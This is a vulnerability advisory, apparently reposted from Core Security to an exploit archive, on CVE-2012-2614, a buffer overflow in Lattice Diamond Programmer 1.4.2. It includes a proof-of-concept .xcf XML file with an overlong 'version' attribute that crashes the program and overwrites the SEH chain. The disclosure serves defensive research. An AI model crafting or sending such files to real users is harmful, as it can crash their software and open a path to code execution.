Exploit for windows platform in category dos / poc
Lattice Diamond Programmer Buffer Overflow
1. *Advisory Information*
Title: Lattice Diamond Programmer Buffer Overflow
Advisory ID: CORE-2012-0530
Advisory URL:
http://www.coresecurity.com/content/lattice-diamond-programmer-buffer-overflow
Date published: 2012-06-21
Date of last update: 2012-06-21
Vendors contacted: Lattice Semiconductor Corporation
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2012-2614
3. *Vulnerability Description*
Lattice Diamond Programmer [1] is vulnerable to client-side attacks,
which can be exploited by remote attackers to run arbitrary code by
sending specially crafted '.xcf' files.
4. *Vulnerable packages*
. Diamond Programmer 1.4.2 for Windows.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
The vendor did not reply any contact email sent by Core Security
Advisories Team. Contact Lattice for further information about this
issue [2]. Given that this is a client-side vulnerability, affected
users should not open untrusted '.xcf' files using 'programmer.exe' nor
'deployment.exe'.
7. *Credits*
This vulnerability was discovered and researched by Daniel Kazimirow and
Ricardo Narvaja from Core Security Exploit Team.
8. *Technical Description / Proof of Concept Code*
This vulnerability can be exploited by opening a specially crafted
'.xcf' file from 'programmer.exe'. The module 'deployment.exe' may also
be vulnerable, but this possiblity was not researched any further.
The XML file showed at [Sec. 8.1] crashes 'programmer.exe' at the address:
/-----
00FB5E20 8A0402 MOV AL,BYTE PTR DS:[EDX+EAX]
00FB5E23 C2 0400 RETN 4
-----/
and overwrites the SEH chain (there is no SEH protection) with
'41414141', which is proof that the buffer was overflown. This means
that there is a buffer overflow vulnerability, and 'EIP' can be set to
an arbitrary value, allowing an attacker to take control of the machine.
8.1. *Proof of Concept*
/-----
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<Comment></Comment>
<Chain>
<Comm>JTAG</Comm>
<Device>
<Pos>1</Pos>
<Vendor>Lattice</Vendor>
<Family>ispLSI 5000VE</Family>
<Name>5256VE</Name>
<IDCode>0x00368043</IDCode>
<Package>128-pin TQFP</Package>
<PON>ispLSI5256VE-XXLT128</PON>
<Bypass>
<InstrLen>5</InstrLen>
<InstrVal>11111</InstrVal>
<BScanLen>1</BScanLen>
<BScanVal>0</BScanVal>
</Bypass>
<File>C:\ispTOOLS\ispvmsystem\TutorialU6vea.jed</File>
<FileTime>05/17/02 18:15:33</FileTime>
<JedecChecksum>0xF9BD</JedecChecksum>
<Operation>Erase,Program,Verify</Operation>
<Option>
<SVFVendor>JTAG STANDARD</SVFVendor>
<IOState>HighZ</IOState>
<IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
<Reinitialize value="TRUE"/>
<OverideUES value="TRUE"/>
<TCKFrequency>1.000000 MHz</TCKFrequency>
<SVFProcessor>ispVM</SVFProcessor>
<Usercode>0x0000F9BD</Usercode>
</Option>
</Device>
</Chain>
<ProjectOptions>
<Program>SEQUENTIAL</Program>
<Process>ENTIRED CHAIN</Process>
<OperationOverride>No Override</OperationOverride>
<StartTAP>TLR</StartTAP>
<EndTAP>TLR</EndTAP>
<DeGlitch value="TRUE"/>
<VerifyUsercode value="TRUE"/>
<PinSetting>
TMS LOW;
TCK LOW;
TDI LOW;
TDO LOW;
TRST ABSENT;
CableEN HIGH;
</PinSetting>
</ProjectOptions>
</ispXCF>
-----/
9. *Report Timeline*
. 2012-05-30:
Core Security Technologies notifies Lattice Semiconductor Corporation of
the vulnerability. Publication date is set for June 26th, 2012.
. 2012-06-06:
Core notifies Lattice Semiconductor Corporation of the vulnerability.
. 2012-06-11:
Core notifies that the previous emails were not answered and requests
for a reply.
. 2012-06-11:
Vendor asks Core to remove their email addresses from Core's mailing lists.
. 2012-06-11:
Core requests an email address or any other security contact information
at Lattice in order to begin discussions in regards to the
vulnerability. No reply was received.
. 2012-06-21:
Advisory CORE-2012-0530 published.
10. *References*
[1] http://www.latticesemi.com/products/designsoftware/diamond/index.cfm.
[2] Lattice technical support, mailto:[emailΒ protected]
# 0day.today [2018-02-19] #